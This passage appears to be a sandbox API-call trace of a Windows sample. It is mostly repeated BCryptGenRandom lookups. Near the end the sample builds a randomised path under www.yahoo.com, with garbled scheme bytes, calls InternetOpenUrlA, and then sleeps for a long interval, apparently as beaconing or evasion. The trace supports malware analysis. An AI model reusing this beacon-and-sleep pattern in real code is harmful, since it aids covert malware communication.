pbBuffer=0x46ffd5f) returned 0x0 [0242.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02e98, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02e98) returned 0x0 [0242.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ebb, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a02ebb) returned 0x0 [0242.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ecf, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a02ecf) returned 0x0 [0243.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.137] GetProcessHeap () returned 0x440000 [0243.137] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0243.137] lstrcpyA (in: lpString1=0x473140, lpString2="Ô=^Øs://www.yahoo.com" | out: lpString1="Ô=^Øs://www.yahoo.com") returned="Ô=^Øs://www.yahoo.com" [0243.137] lstrcatA (in: lpString1="Ô=^Øs://www.yahoo.com", lpString2="/LckgvauhOx8jky6krroTwitysclzId15lZa/6ppmiAMlgcXkJbl2e3Naeq3r3ia038DtO0/vhiuMigtH2ou4reRbSjc5Ybz11xr5och81/sj2rjnr13Qhwp1oo14u/mCLviltfM4tcw53bVhplbOpjou8aHR2Stgcuyp/" | out: lpString1="Ô=^Øs://www.yahoo.com/LckgvauhOx8jky6krroTwitysclzId15lZa/6ppmiAMlgcXkJbl2e3Naeq3r3ia038DtO0/vhiuMigtH2ou4reRbSjc5Ybz11xr5och81/sj2rjnr13Qhwp1oo14u/mCLviltfM4tcw53bVhplbOpjou8aHR2Stgcuyp/") returned="Ô=^Øs://www.yahoo.com/LckgvauhOx8jky6krroTwitysclzId15lZa/6ppmiAMlgcXkJbl2e3Naeq3r3ia038DtO0/vhiuMigtH2ou4reRbSjc5Ybz11xr5och81/sj2rjnr13Qhwp1oo14u/mCLviltfM4tcw53bVhplbOpjou8aHR2Stgcuyp/" [0243.137] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0243.137] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Ô=^Øs://www.yahoo.com/LckgvauhOx8jky6krroTwitysclzId15lZa/6ppmiAMlgcXkJbl2e3Naeq3r3ia038DtO0/vhiuMigtH2ou4reRbSjc5Ybz11xr5och81/sj2rjnr13Qhwp1oo14u/mCLviltfM4tcw53bVhplbOpjou8aHR2Stgcuyp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0243.137] GetProcessHeap () returned 0x440000 [0243.137] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0243.137] GetProcessHeap () returned 0x440000 [0243.137] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02e50 | out: hHeap=0x440000) returned 1 [0243.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0243.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0243.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0243.138] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0243.138] Sleep (dwMilliseconds=0x19af5) [0243.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0243.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.352] GetProcessHeap () returned 0x440000 [0243.352] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0243.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.353] GetProcAddress 